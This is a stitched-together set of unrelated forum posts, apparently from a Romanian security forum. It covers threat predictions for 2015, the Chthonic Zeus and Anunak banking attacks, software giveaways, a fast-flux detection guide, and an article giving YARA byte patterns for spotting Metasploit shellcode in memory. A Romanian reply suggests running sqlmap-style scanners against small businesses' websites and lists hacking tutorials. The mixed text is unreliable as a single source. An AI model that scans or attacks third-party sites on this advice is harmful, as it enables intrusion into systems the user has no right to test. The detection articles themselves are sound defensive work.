Aerosol

Introduction With just a few days until the end of 2014, it’s time to analyze what’s happened in the last twelve months. I would like to analyze with you the main events that have characterized the security threat landscape in 2014 and try to make predictions for 2015. 2014: Reviewing my predictions In December 2013, I tried to imagine the principal events for the cyber security landscape in 2014. I was particularly concerned with the effects of the militarization of the cyberspace and the rapid diffusion of malicious code specifically designed to target devices belonging to the Internet of Things. In both cases my predictions have been confirmed by events that occurred in the last year. The number of cyber operations attributed to state-sponsored hackers is increasing, and their level of sophistication is very worrying because attackers implement evasion techniques that allow their malicious code to remain under the radar for a long time. Practically every government is continuing to invest in the development of cyber weapons. The majority of them are evaluating the idea of an active defense. While the US is reorganizing the structures and the governance of the National Intelligence following the Snowden revelations, countries like China, Russia and North Korea have increased their efforts in the improvement of their cyber arsenal and the number of resources dedicated to the Information Warfare. Below is the list of predictions I made last year that we will discuss together. Prediction US intelligence on the rise – NSA 2.0 Cyber weapons in the wild Tor Network, cybercrime and law enforcement Internet of Things malware explosion Hardware Backdoor e-hardware qualification – New frontiers of cyber espionage A major cyber attack may happen Increase number of attacks against Defense consultants and subcontractors Bitcoin … lights and shadows Gaming between cyber espionage and cyber threat monitoring The documents leaked by the former intelligence consultant Edward Snowden had serious repercussions on US intelligence agencies. The internal structure of the overall US Secret Services was reorganized, and experts believe that its techniques and procedure have also been completely reviewed. Evidence of a profound change occurred in April, when Admiral Michael S. Rogers succeeded General Keith B. Alexander as head of the main intelligence agency in the world, the NSA. The Admiral has a deep knowledge of information warfare. In 2009 he became commander of the U.S. Fleet Cyber Command and commander of U.S. 10th Fleet, with responsibility for all of the Navy’s cyber warfare efforts. He is the first Information Dominance Warfare (IDC) officer to achieve the rank of vice admiral, demonstrating the importance of cyberspace in the modern doctrine of warfare. I have also predicted the diffusion in the wild of new cyber warfare, although attribution is not easy when researchers analyze malicious components designed by government entities. Security experts have discovered several malwares in the wild that are likely to have been designed by governments. The Regin backdoor and the Snake campaign are just a couple of malicious code that infected computers worldwide. I also predicted the intensification of the activities conducted by law enforcement to fight cyber criminal activities that exploit dark nets. The recent operation Onymous demonstrates the efficiency of the methods adopted by police worldwide to track criminal crews behind principal black markets in the Tor Network. I also predicted the explosion of malware with malicious code specifically designed to compromise Internet of Things devices. Despite that the number of malicious codes and “thingbots” discovered in the wild (i.e. Spike botnet) is still limited, it is likely that the experts will discover new agents targeting smart meters, smartTVs, SoHO routers and similar devices. Sincerely speaking, I was thinking to an explosion of the number of malwares, but the phenomena were limited if compared to the rapid diffusion of the paradigm. Regarding the qualification of hardware and software, I consider that this year very little was done, certainly below my expectations expressed twelve months ago. The situation is quite similar for the spread of the paradigm of User Controlled Encryption, which hasn’t reached the level of diffusion I expected. I was right when I predicted an increase pressure on consultants and subcontractors, unfortunately they still represent the weakest link of the security chain and it is normal that APTs have targeted them with surgical attacks. I also predicted a major cyber attack against a critical infrastructure or a company. In effect, it’s my opinion that despite that the number of attacks increased in a significant way and new major hacking campaigns were discovered, fortunately no incidents caused damages to infrastructures, nor were there losses of human life. My prediction on Bitcoin was correct: the speculative bubble of a few months ago was deflated, and everyone sees the popular virtual currency with different eyes. Regarding the other predictions I made on the evolution of cybercrime, as I premised, it was too easy to forecast the explosion of malware, especially for mobile platforms, and the same thing for the number of abuses of cloud infrastructure and social media accounts. I also predicted that numerous platforms were still vulnerable because the systems were using outdated systems or not properly configured platforms. I also overestimated the potential effect of hacking campaigns run by hacktivists. Anyway, I always consider these groups really dangerous and to consider with great respect to avoid surprises. 2015 Predictions 2015 is almost upon us, and it is time for predictions regarding the principal events that will characterize the cyber threat landscape in the next year. Below are my predictions on the scenarios that we will see in the next 12 months. New actors will overlook the scenario of cyberwar and information warfare. Almost every government is investing huge resources to improve cyber capabilities. Many countries announced the creation of cyber armies composed of highly skilled hackers who have to defend their nation from attacks originating in cyberspace. Cyber warfare is very attractive to small nations. The development of a government-built malware is cheaper than any other conventional weapon and far more accessible to any nation-state. Cyber warfare represents for every government an efficient alternative to conventional weapons. A cyber weapon allows small countries to run covert cyber attacks without as much risk of getting discovered. North Korea, Syria, and Iran are among the countries that have developed great capabilities that pose a serious threat to major Western states. The risk of a serious attack on the critical infrastructure of a Western government is high, and its attribution will be even more difficult. The number of cyber attacks against private companies and operated by criminal crews will continue to increase. Healthcare will be one of the sectors most targeted by cyber criminals. Companies operating in the sector are a privileged target because of the wealth of personal data they manage, and that represents a precious commodity in the criminal underground. Healthcare data are valuable because medical records can be used to commit several types of fraudulent activities or identity theft. Their value in the hacking underground is greater than stolen credit card data. The criminal phenomena will become more frequent in countries like the United States and the United Kingdom in which criminal organizations are specializing in cyber attacks against infrastructures that manage Electronic Health Records (EHRs). Computer espionage will represent the first threat to the economy of many states.The number of targeted attacks against government organizations and companies operating in critical sectors such as defense and high tech will rapidly increase. Regardless of the nature of the actors responsible for the offensives, cyber criminals or state-sponsored hackers, the number of the attacks will increase due to the availability of a growing number of online tools and services that allow bad actors to hit a target with great simplicity. The economy of an attack will continue to benefit the attacker, who with a limited budged and relatively modest resources is able to cause extensive damage to the objectives. A new exploit kit specifically developed to compromise mobile platforms will be available in the wild. Android will be the most target platforms and new malicious code will be proposed in the cyber criminal underground. The attacks will benefit from a significant increase of phishing attacks on mobile devices, as malicious links and applications downloaded from third-party stores redirect users to websites hosting the malicious exploit kit. Once visited by victims, their mobile will become infected. Probably mobile online banking will be the industry most targeted by this kind of attack. Cybercrime will continue relentlessly to increase its profits despite the effectiveness of operations by major intelligence and law enforcement agencies. The recent operation Onymous run by law enforcement has deeply impacted the underground ecosystem. New operators will join the criminal ecosystem, and existing ones will consolidate their illegal activities. It’s easy to predict an increase in the number of fraudulent activities run through anonymizing networks like Tor. The number of cyber attacks against devices of the Internet of Things will rise inexorably. IoT devices will be targeted mainly by specifically designed malware that is able to compromise this family of systems. The possible effects for the surge of cyber attacks on Internet of Things devices are significant data breaches and the sabotage of equipment in which the units operate. IoT devices are actually deployed worldwide and are easy to locate, and in many cases present a lack of security measures that would make them resilient to external offensives. Point-of-sale (PoS) malware will become one of the most common methods of stealing data and money. The number of malware that are designed to compromise the POS system will increase. This category of malicious codes will be enriched by a new strain of malware that implements new features and which will be particularly difficult to detect. Malware authors will concentrate their efforts in the development of new evasion techniques and code obfuscation to make the detection of the malicious agent difficult. As a consequence, the number of data breaches will increase with unpredictable consequences for the victims. Cloud services under attack. iCloud, GoogleDrive, DropBox and other cloud services will become an attractive target for cyber criminals and state-sponsored hackers. The attacks can cause the exposure of sensitive data, representing a serious threat to private companies. Cyber attacks against cloud services will also become an essential component for hacking campaigns operated by APTs worldwide. References Unordinary Predictions for Information Security in 2014 - InfoSec Institute Beware the militarization of cyberspace | Fox News Source

Acum apar si mie dar in momentul cand am postat erau probleme...

@JIHAD numai vorbi aiurea. Bun venit pe RST, frumoasa prezentare.

1. asta nu e show off (nu e facut de tine ) 2. metin serios? noi nu ne jucam metin Locul postului tau e la " Cosul de gunoi "

A new strain of Zeus Trojan dubbed Chthonic has been discovered in the wild targeting more than 150 banks and 20 payment systems mainly in Europe. Experts believe they have seen everything about the Zeus trojan, P2P versions, versions that infect SaaS, agents that exploit the Tor network or that recruit money mules … then promptly a new strain of the malware appears in the wild and astonishes all. The new Zeus variant is dubbed Chthonic and relies on a new mechanism to load its modules. The new strain of malware infected machines prevalently in the UK, Spain, US, Russia and Japan. Other infections have also been reported in other European countries, including Bulgaria, Ireland, France, Germany and Italy. Chthonic is served to the victims through the Andromeda bot, as well as through an exploit for a vulnerability in Microsoft Office (CVE-2014-1761) that is distributed via email. “A significant new malware threat targeting online banking systems and their customers has been detected by Kaspersky Lab’s security analysts. Identified as an evolution of the infamous ZeuS Trojan, Trojan-Banker.Win32.Chthonic, or Chthonic for short, is known to have hit over 150 different banks and 20 payment systems in 15 countries. It appears to be mainly targeting financial institutions in the UK, Spain, the US, Russia, Japan and Italy.” states a blog post published by Kaspersky Lab. The Expert discovered that many components of Chthonic are compatible with 64-bit systems, it combines the encryption scheme from other strains of Zeus, as well as a virtual machine implemented by ZeusVM and KINS trojan. “Chthonic shares some similarities with other Trojans. It uses the same encryptor and downloader as Andromeda bots, the same encryption scheme as Zeus AES and Zeus V2 Trojans, and a virtual machine similar to that used in ZeusVM and KINS malware.” continues the post. Chthonic uses a main module that download all the other modules of the malware, the agent works with both 32-bit and 64-bit platforms and among its capabilities there is collecting system information, stealing passwords from the system through Pony malware, keylogging, web camera control, form grabbing, web injection and remote access through VNC remote desktop component. The experts highlighted the web injectors of Chthonic that allow the malware to insert its own code in the browser when victims visit the website of targeted banks. “Chthonic exploits computer functions including the web camera and keyboard to steal online banking credentials such as saved passwords. Attackers can also connect to the computer remotely and command it to carry out transactions.” states the report. “Chthonic’s main weapon, however, is web injectors. These enable the Trojan to insert its own code and images into the bank pages loaded by the computer’s browser, allowing the attackers to obtain the victim’s phone number, one-time passwords and PINs, as well as any login and password details entered by the user.” The attack scheme is not different from the one implemented with other strain of Zeus, it relies on the man-in-the-middle technique that allows Chthonic to intercept communication from the client to the targeted bank and modifies the web page loaded in the browser injecting the necessary code. The code injection allows attackers to steal banking information (log-in details, PIN, one-time password). At least in one attack against a Japanese bank, Chthonic was able to hide the bank’s warnings, meanwhile affected customers of Russian banks were deceived using an iframe with a phishing copy of the website that has the same size as the original window. “Fortunately, many code fragments used by Chthonic to perform web injections can no longer be used, because banks have changed the structure of their pages and in some cases, the domains as well.” The discovery of Chthonic trojan is the demonstration that the ZeuS Trojan is still evolving thanks also to the availability of its source code in the hacking underground. ““The discovery of Chthonic confirms that the ZeuS Trojan is still actively evolving. Malware writers are making full use of the latest techniques, helped considerably by the leak of the ZeuS source code. “ A detailed analysis of the malware is available on SecureList website. Source

Security researchers discovered a criminal crew called Anunak that has already stolen $17 million from banks, retailers and others firms since 2013. Security companies Group-IB and Fox-IT have conducted a joint investigation on a cyber espionage group called called Anunak, which has been targeting banks and payment systems in Russia and Commonwealth of Independent States countries, and that hit US and US over the last months. “The group has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia, using standard banking malware, mainly Carberp.“ states the report issued by the companies. The Anunak hacking crew was composed of individuals from Russia and Ukraine, which were involved in the banking frauds operated through the Carberp botnet. Many exponents of the organization behind the Carberp botnet were arrested in 2012, but one of them realized to change tactic targeting directly financial institutions, including banks and payment providers, instead the final customer. The technique adopted by the Anunak gang initially targets an ordinary employee machine with the intent to gather credentials of a user with administrative rights on some computers within the network of the financial institution. The scope of the attackers is to obtain the domain administrator password from the server, at this point gaining access to the domain controller they can compromise of all active domain accounts. At this point, the attackers can access the email server and all the banking system administrator workstations installing software to spy in the operators. In this way, the Anunak gang is able to configure remote access to servers of interest, including firewall configuration changes. Anunak malware was used to compromise both the network of targeted financial institutions and compromised ATM management system. “We have seen criminals branching out for years, for example with POS malware,” says Andy Chandler, Fox-IT’s SVP and general manager, in a statement. “ Anunak has capabilities which pose threats across multiple continents and industries. It shows there’s a grey area between APT and botnets. The criminal’s pragmatic approach once more starts a new chapter in the cyber-crime ecosystem.” The Anunak APT had access to more than 50 Russian banks, five payment systems and 16 retail companies. The hackers caused serious problems to two financial institutions, which identities were unrevealed, that were deprived of their banking license. The experts estimated that the gang has stolen around US$ 17 million (£10.9 million), in the last six months, the expert Brian Krebs linked the Anunak gang to the data breach at Staples that caused the exposure of more than one million payment cards are. The report states that the average time from access to the internal network to money being stolen was 42 days, The security expert Graham Cluley explained in a blog post on that the hackers have not hacked retailers in their own country, differently from banks. “One curious aspect is that it appears retailers in Russia are not targeted by the Anunak hackers, although financial institutions are. Could there be a reason why the hackers feel more comfortable not targeting retailers on their doorstep? “It would be easy to speculate that the hackers are wary of poking a grizzly bear on their own doorstep because of potential repercussions, and so avoid hacking local retailers, but that doesn’t explain why they seem to be so unworried about earning the wrath of Russian financial institutions.” Credits: Eastern APT group Anunak steals millions from banks | Security Affairs

Tenorshare Windows Boot Genius allows you to create a bootable/recovery CD/DVD/USB to repair Windows boot issues, backup/restore data, reset Windows local and domain account passwords, and more. This giveaway has no free updates or tech support and is for home/personal use only. Get Tenorshare Windows Boot Genius with free lifetime upgrades for free updates, free tech support, business + home use, and ability to install/reinstall whenever you want. Also be sure to check our Active Sales list for more free and discounted software! Sale ends in 1 day 13 hrs 13 mins Link: Free Tenorshare Windows Boot Genius (100% discount)

DxO ViewPoint provides easy-to-use tools to correct perspective, distortion, and proportion problems in photos. Want more features? Get DxO ViewPoint 2 with free updates, the latest and greatest version of DxO ViewPoint! Also be sure to check our Active Sales list for more free and discounted software! Sale ends in 64 days 13 hrs 13 mins Free DxO ViewPoint

1.Cum gasesc vulnerabilitate unui site ? Am inteles cu sql dar ce e sql ? 2.Daca gasesc vulnerabilitate unui site aflu ceva cu sql sau imi trebuie altceva ? 1. Vulnerabilitatile sunt de mai multe feluri ( SQLi / XSS/ LFI / RFI / RCE / FPD etc... ) Ca sa gasesti un site vulnerabil trebuie sa ai cunostiite minime cand vine vorba de PHP / HTML / JS etc... sau ca un skiddie folosesti scannere automate ( Gen morcovu' sau slq map cautand vulnerabilitati in site-uri de batut covoare sau desfundat wc-uri) 2. Ca sa exploatezi din nou ori folosesti un tool (Morcov / SQL Map / Acunetix sau mai stiu eu ce ) ori faci manual. 3. Nimeni nu ii mai spune " ROOT" de prin 2007/2008 doar "lame or n00b" si poti face foarte multe acum depinde cat te duce capul. 4. nu stiu sigur asa ca nu ma bag. 5. mai bine ai sterge punctul 5. ===================================================== https://rstforums.com/forum/93687-advanced-sqlmap.rst https://rstforums.com/forum/93613-fuzzing-sql-injection-burp-suite-intruder.rst https://rstforums.com/forum/92911-xss-tutorial.rst https://rstforums.com/forum/92910-lfi-vulnerability-exploitation.rst https://rstforums.com/forum/92734-sql-injection-advanced-tutorial.rst https://rstforums.com/forum/92730-sql-injection.rst https://rstforums.com/forum/92729-beginners-tutorial-sql-injection.rst https://rstforums.com/forum/92731-ip-grabbing-via-sql-injection.rst https://rstforums.com/forum/93500-website-hacking-101-a.rst https://rstforums.com/forum/93501-website-hacking-101-part-ii.rst https://rstforums.com/forum/93503-website-hacking-101-part-iii.rst https://rstforums.com/forum/93504-website-hacking-part-iv-tips-better-website-security.rst https://rstforums.com/forum/93499-website-hacking-part-v.rst Si multe altele!

Introduction During an analysis, it can be really useful to know some common instructions with which malware, and more specifically shellcodes, achieve their goals. As we can imagine, these sets of common instructions could be used first to locate and later to analyze and/or to identify general threats: embedded or injected code. In this article, we’ll focus on the identification and analysis of Metasploit and some custom shellcodes on the basis of parameters and information coming from brief research and personal experience. We’ll start our analysis from some previously created memory images. Some of these come directly from real incidents that have occurred, while others are specially created. We’ll look at several shellcodes in order to understand exactly how they work and how to recognize them on the basis of characteristics you notice during the analysis of a possible incident, and/or on the basis of instructions that in most cases are performed to make the shellcode as reusable and effective as possible. It’s important however to understand that this is not an exact science and that the techniques used here could work for some situations, but could not be useful for others. Bad guys put in place many techniques to make their code as stealthy as possible, like the use of many alternative instructions to achieve the same result, the use of unnecessary instructions (push reg, pop reg, xor reg, reg) to avoid pattern recognition, and obviously the encoding of payloads (also used to avoid null bytes). In general, it’s always necessary that you put into play your own experience and knowledge to deal with a wide range of situations. This article has no pretensions to cover every possible eventuality in the identification of malicious shellcodes (just because of the concepts expressed above, this would be impossible), but presents an approach based on the creation of recognition of patterns based on a particular behavior of a service (such as listening port to a non-conventional) and/or on the research for those operations that shellcode must necessarily run to be effective (such as the recovery of the IP, since with the instruction ‘mov eax,EIP’ it’s still not valid :] ). It’s equally important to understand that the experience and the skills of the analyst are very important (and irreplaceable) to quickly identify false positives. Try to Find What You See Sometimes it can be quite easy to locate the exact point of malicious code. This is because the effect of its execution is evident during the first general analysis. This example takes the assumption that the payload is not encoded. Let’s start with a previously generated memory image named “win.raw“: The suggested profile is Win7SP0x86. We can subsequently retrieve all running processes making a “pslist” command. The following is the result: We can now have a look at the connections state: It’s possible to quickly identify something strange with PID 2760. It’s listening on port 5555. We can dump the process to have a deeper view and to investigate it: The file with a HEX editor looks quite strange (marked in red in the screenshot below): Sections appear to be duplicated. The executable has been modified in order to execute some kind of code first and to land to the original code later. In this case, if we want to build a custom rule to find a specific part of the code, we can imagine how a specific ‘asm’ part of this code could look, and specifically the part where the code goes to bind to the port to the interface in order to listen on 5555. The code should look like: The instruction “push dword 0xb3150002” will be my custom pattern to find. We can so write this signature rule for the YARA engine: And to start volatility with the following syntax using the YARA scan feature, perform a search on the entire image: Obtain after a while the following result: Something is found loaded in the wininit.exe area (PID 384). We go to dump wininit.exe as well to have a look at what strange monster is inside, and I saw the same signature. This is what has been obtained: And finally we have the disassembled shellcode with my comments in green: EE == Encode Everything (as ‘Goph’ said) Very often, locating shellcodes on the basis of “what we see” is not so easy because of both real operations performed by them and the use of encoded payloads used to avoid fast signature detection and identification. Polymorphism and other code obfuscation techniques are the norm today in malicious code. The process to make a polymorphic payload typically includes encoding a payload like the one just seen and to insert a decoding stub before the encoded code. The following is a general image which represents a polymorphic mechanism to clarify the general work load: The most used mechanisms to generate polymorphic shellcode are XOR encoders and XOR additive feedback encoders. In general, it’s impossible to talk about polymorphic shellcodes without speaking about the famous Shikata-Ga-Nai encoder, a polymorphic XOR additive feedback encoder available with the Metasploit framework. Shikata-Ga-Nai This encoder offer several features that combined can provide a good level of protection, and between these there is the use of different permutations of instructions for each operation. This means that for the same set of instructions, we will have always a slightly different result. For example, having a look at the dissassembled instruction below, at 0x0000000c we have a “sub ecx,ecx” to zero the register, represented as “x29xc9“. img]http://resources.infosecinstitute.com/wp-content/uploads/122114_1257_PatternBase14.png The same instruction can be represented with different values, for example “x31xc9?, “x33xc9?, “x2bxc9?. Let’s take another example with a real Shikata-Ga-Nai encoded shellcode. The following is the initial set of instructions of the same encoded payload. Look at the red. ##################################### ##################################### ##################################### Instead of referring to the payload itself to locate an encoded payload, we can in this case focus on some istructions needed by the shellcode to properly work. We have to consider that a shellcode must be as reusable as possible, and for this they generally need to know where they are during the execution. In a nutshell, they need to find the IP (a process called GetEIP or GetPC). Some steps the code has to achieve to be effective are: Find EIP Call the decoder stub Retrieve addresses of functions Exec payload (bind shell) A mechanism to get EIP is to use some special FPU instructions. We can always have a look at the image presented before: The instruction at 0×00000007 stores FPU environment values to the specific memory area. The next instruction assigns the register to the EIP value, so the routine achieves the need to find EIP. Because the fnstenv instruction is a dependency of this algorithm, we can use it to build a new, very simple rule like this: In order to locate our “Shikata_Ga_Nai” shellcode: The interesting disassembled code of this stage is the following, with my comments in green: CALL4 DWORD XOR Call4 DWORD XOR is an encoder present in the Metasploit framework. It’s quite easy to detect because of its common instructions. Looking at the encoder source code: It’s quite simple to make our YARA rule. As already mentioned, the bad code must get the value of the instruction pointer. There are different techniques that can be used to get the value of the instruction pointer on x86, however, most of them rely on the use of call instruction. These instructions are generally composed of high ASCII bytes like 0xe8 or 0xff. This is the case of this algorithm and others. With the YARA rule above, we can try to search for evidence of a so encoded shellcode as well. Something We Have to Look For As explained above, the first step in most decoder stubs is to use a set of instructions to retrieve the location of the instruction pointer. This is because the decoder most likely will have the encoded data after the decoder stub and will need to know where it is. If the decoder stub knows the address, it knows also where the encoded data is. Retrieving the value of an instruction pointer is a challenge usually addressed with a series of common instructions, described in the following sections. GetPC Code A reliable shellcode should avoid any hard-coded absolute addressing. The decryption routine has to find a way to dynamically find the address of the encrypted payload in the target’s address space. This is accomplished by the so called “GetPC” code. GetPC code should be among the first few instructions of the bad code, and for this, locating the GetPC instructions often means to locate the start of the decryption routine as well. Call 0×5 The easiest and the most common way to implement Get PC code on x86 is using the CALL instruction. Since CALLs push the next address on the stack, shellcoders just need to retrieve it with a POP and they will get the address. The corresponding asm of a sample code should look like the following: And this is its opcodes: A YARA rule for this pattern would look like E8 00 00 00 00 5? (considering the possibility to pop different registers). Note that this method can not be used in many cases because it contains null bytes. This could be interpreted as a string terminator. Call 0×4 The asm for a call $+4 method to recover the memory position would look like this: And equivalent opcodes would be: A generic YARA rule to look at this set of instructions could be E8 FF FF FF FF C? 5? Jmp / Call / Pop To quickly understand the jmp-call-pop method to retrieve the address of the current location, a simple code example could be useful: The asm of a real shellcode making use of this method would look like this: At loc_00000004 looping instructions start. We must considering these for our rule that could appears like EB ?? 5? [5-15] E8 ?? FF FF FF… FSTENV When we discussed the shikata_ga_nai encoder before, we saw a trick to get the location of the shellcode. This trick is based on FPU instructions. First executing any FP (floating point) instruction on top and then FSTENV PTR SS: [ESP-C] will result in getting the address of the first FP instruction. If the first FP instruction is the first instruction of the code, you will get the base address of your code. This address will be stored at 0xC offset. Using a common POP instruction, you can put this address in one register. Refer to the previous section about shikata_ga_nai for an example of this code. Obviously, searching for the opcodes of FSTENV [ESP-0xC] can help to find bad code based on it. Assembling this instruction, we’ll get: A quick YARA rule to extract possible evidence related to an encoder, making use of fstenv, would look like D9 74 24 F4 5? GetPC SEH Based Another way to have a GetPC code is through the use of Windows Structure Exception Handler (SEH). When an exception happens, Windows generates an exception record that contains the necessary information for handling the exception, including the value of the program counter at the time the exception was generated. This information is stored on the stack and could be retrieved by the shellcode registering a custom exception handler. The following are the steps needed to use this method: Register a custom exception handler Trigger an exception Extract the absolute memory address of the faulting instruction This technique is however not used much anymore and is considered “old” because Microsoft, on a newer version of its system, has added additional controls to be sure the SEH chain is not corrupted before transferring control to it. Finding Kernel32 Base Address In Windows, user-mode API’s are exported as objects that are mapped into the process space during runtime. The common names of these objects are .dll (Dynamically Linked Library). The only .dll that is guaranteed to be mapped into a process space is kernel32.dll. In order to be reliable and reusable, shellcodes must dynamically locate some functions, typically the LoadLibraryA and the GetProcAddress. If the bad code has access to these two functions, it can load any library on the system and find any exported symbols. Both of these two functions are exported by kernel32.dll, so we expect the shellcode has to achieve these two goals: Find kernel32.dll address Parse PE of kernel32 and search for LoadLibraryA and GetProcAddress functions. PEB One of the most common methods to retrieve the kernel32.dll base address is to make use of a Process Environment Block (PEB). The operating system allocates a structure for every running process that can always be found at fs:[0x30] within the process. The PEB structure holds information about the process and the image and regarding loaded modules mapped into process space. The order list of initialized modules has been always constant (up to Windows 7), and kernel32.dll has been always the second module to be initialized (after ntdll.dll) in the InInitializationOrder list. A typical set of instructions to locate the kernel32.dll base address in all Windows operating systems up to Windows Vista has been the following: This method works for all version of Windows from 2000 including Vista. However, due the new kernel structure of Windows 7, a new module called kernelbase.dll is loaded before kernel32.dll as it appears in the second entry of the InInitializationOrder module list. A way to retrieve the kernel32.dll in a more reliable way in all Microsoft systems is to parse the InMemoryOrder module list instead of the InInitializationOrder module list, resulting in these instructions below: Two quick patterns could so be extracted by these techniques in order to find the instructions used to locate the kernel32.dll base address through PEB: 64 8B ?? 30 8B ?? 0C 8B ?? 1C 64 8B ?? 30 8B ?? 0C 8B ?? 14 SEH Another reliable method to retrieve the kernel32.dll base address is to exploit the Structured Exception Handling (SEH). This technique takes advantage of the fact that the default Unhandled Exception Handler uses a function that exists in kernel32.dll. Walking through an SEH chain starting from the higher entry fs:[0], we can list all installed Exception Handlers until we reach the last one. At the end of the SEH chain (at the bottom of the stack), there is a default exception handler that is registered by the system for every thread. The shellcode can so start from FS:[0] and walk the SEH chain until reaching the last SEH frame, and from there we get a pointer into kernel32.dll. This is an example code: When the last exception handler is reached, the address of the function pointer can be used as a starting point for walking down searching for a magic “MZ” (cmp WORD PTR [eax,0x5a4d]). Once a match is found, we can assume that the base address of kernel32.dll is found. We can take “kernel32_base_loop” as our base to build a rule: The full pattern could appear: 8B 40 04 48 66 31 C0 66 81 38 4D 5A TEB POINTER Using a pointer stored in the Thread Environment Block (TEB), it’s possible to extract the address of the top of the stack. Each thread has its own corresponding TEB and can be accessed referencing fs:[0x18]. The top of the stack of threads can be found at 0×4 into the TEB. Starting from here, 0x1c bytes into the stack holds a pointer to somewhere in kernel32.dll. Walking down once again like in the SEH method, we can search for the magic “MZ” string. Once a match is found, we can assume that the base address of kernel32.dll is found. This is an example of code: And this is a hypothetical rule: 8B 40 E4 48 66 31 C0 66 81 38 4D 5A Handling False Positives We could write a book about a topic of gender, and generally each case has its peculiarities. The skills of analysts generally make the difference. Obviously no method is immune to false positives. The recurrence of known instruction patterns within licit code will be reported as suspect, and it will have to be deeply analyzed. Personal experience and the knowledge of instructions friendly to shellcoders will certainly help a lot. A simple instruction like this for example: will appear in shellcodes like this: in order to avoid null bytes. XOR, in fact, is a big friend of shellcoders and should be certainly to be considered a lot while viewing dumps or while creating a custom rule. Other instructions used in shellcodes are: add dec inc mov jmp push pop cmp test jne (usually used after a cmp or test) jnz (testing something equal to 0) lods An example of a dump vol search that returns false positives with these rules may be the following: Here we have five results. The first and second results are a “GENERIC_JMP_POP_CALL” and “PEB_KERNEL32_FIND_ADDRESS”. With this in mind, we can immediately concentrate on these two, as they appear definitely related and perform a full dump of processes. Finally, another factor that we could to take into consideration is the XOR instruction of the first mem dump that is most probably related to the cycle of decryption. Conclusion Malicious code detection can really be a challenge. Besides the use of automated tools for the discovery and recovery of malicious code, it can often be very useful to build our own rules on the basis of what we see or on the basis of those instructions that we know must necessarily be completed by malware. However, it’s important to know that shellcode and malware writers typically refine their strategies more and more to stay in the shade as much as possible and go unnoticed, and could nullify or reduce the effectiveness of our research with more or less complex techniques. Source

With the assumption that readers have read Part 1 of this topic, this article will contain the other part of this article, i.e. what benefits an attacker gets from flux networks, why it is difficult to detect flux networks in your environments, and recommended ways to detect a fast flux network. How is Flux Advantageous for an Attacker? The fast flux attack is a simple attack to conduct with high returns. Below are some of the advantages that fast flux networks, because of their design, offer to attackers: Limited Audit Trails: Since a flux network provides proxy redirection layer front-end nodes, the design offers a layer of protection for any investigation to take place. Even when backtracking, investigations will only yield a handful of IPs relative to frond end nodes of a fast flux network. Ease of operation: Attack buildup, because of its simple design, requires only one main node to host and serve DNS information. URLs point to front end proxy redirectors, which then transparently redirect client connection requests to the actual malicious back end server or servers. Because of this, now only a few servers are required to host malware sites. Support for main nodes: because of the design, fast flux service networks extend the operational lifespan of the critical backend core servers that are hidden by the front-end nodes. Since a protection layer is put forward in the main node, it will take much longer to identify and shut down these core backend servers due to the multiple layers of redirection. Why is Detection of Fast Flux Difficult? Detecting a fast flux network from a legitimate server network is like separating milk from water, as fast flux networks are very difficult to detect and shut down. Consider the following: For single flux networks, the only change in IP address is that of the target site. Fast flux service networks usually have several thousand A records for the same domain name. The TTL value for every A record is much less, thereby prompting DNS resolvers to query in short succession. This seems simple to detect by examining rapidly changing DNS records, but various load balancers today provide this kind of configuration in order to serve the client request fast. The detection of domain names being served by a fast flux service network depends upon multiple analytical passes over DNS query results, with increasing flux detection accuracy gained by employing a scoring mechanism to evaluate multiple relatively short-lived DNS records, taking into account the number of A records returned per query, the number of NS records returned, the diversity of unrelated networks represented, and the presence of broadband or dialup networks in every result set. For double flux, both the NS Records as well as the A records change rapidly. The NS servers are a list of compromised machines having a back-end control to the attacker, thus they provide extra layer of protection for attacker to work without detection. Detecting double flux is twice as difficult as detecting single flux. How to Detect Fast Flux Having said that, and with techniques still being researched today, below are some of the suggested techniques to detect fast flux networks. It should be noted that entities that are covered for detection of fast flux networks covers ISP, domain registrars, service providers, etc. Analyzing of TTLs with the result sets per domain from multiple successive TTL expiration periods can work in identifying the use of fast flux service networks. ISPs should set up policies to block access to controller infrastructure and must enable blocking of port TCP 80 and UDP 53 into user land networks. ISPs should create awareness among the linked up service providers about the threat, shared processes, etc. ISPs should proactively identify and shutdown flux networks using BG route injection. Domain registrars should do a proper auditing and fine tune the response procedures in order to identify any domain registration for any fraudulent purposes. Service providers must start logging DNS queries in the network. The scope can be lessened to only outbound DNS queries, and a proper monitoring team should be active 24/7 for analyzing the DNS queries. Some events to look out for, as discussed earlier, events that return A records with a TTL value of less than 1800 seconds. Teams should also ensure that enough information is getting received in the logs, such as domain name, A records, and NS records, for proper analysis. The security team can also map the IP address related to DNS query response with a TTL of less than 1800 seconds with ASN records, as correlating with ASN records can effectively filter out false positives for fast flux. Cross-validation with Internet blacklists, spam lists, bot lists, etc, will make identification more effective. References Fast flux - Wikipedia, the free encyclopedia Detecting Fast Flux in your environment - InfoSec Nirvana Source

HP’s Zero Day Initiative has decided to adjust its guidelines and criteria or buying some vulnerabilities in the future, eliminating some large classes of bugs from its menu. The group, which has been among the more visible and prominent of the vulnerability purchasing programs since its inception several years ago, has decided that it will no longer pay for several kinds of bugs, including ActiveX flaws, most denial-of-service vulnerabilities and post-authentication SQL injection bugs. One exception to the ActiveX policy, however, is that the ZDI will still purchase ActiveX flaws related to SCADA systems. ZDI was among the first of the corporate vulnerability buying programs to succeed and have a broad effect on the industry. The program has been a key sponsor of the Pwn2Own hacking contest at CanSecWest for many years, as well. ZDI still plans to buy most of the common vulnerability classes it has paid for in the past. “As always, we are looking first at software that is most widely deployed, and especially that which is most widely deployed in the enterprise. We are looking for critical-class vulnerability reports. For examples, we are still buying browser bugs, SCADA bugs, operating-system privilege escalations, sandbox escapes, and most security-product vulnerabilities,” Shannon Sabens of HP said in a blog post. The change in guidelines may reflect the shift in the broader research and hacking communities toward high-value targets such as SCADA systems, sandboxes and others. Attackers have been focusing their energy on browsers and sandbox escapes for years now, and increasingly are turning their attention to SCADA and industrial control systems, as well. The number of researchers who work on SCADA and related topics is tiny relative to the number who focus on Web or application security, but security advisories for ICS and SCADA products are becoming much more common. Source

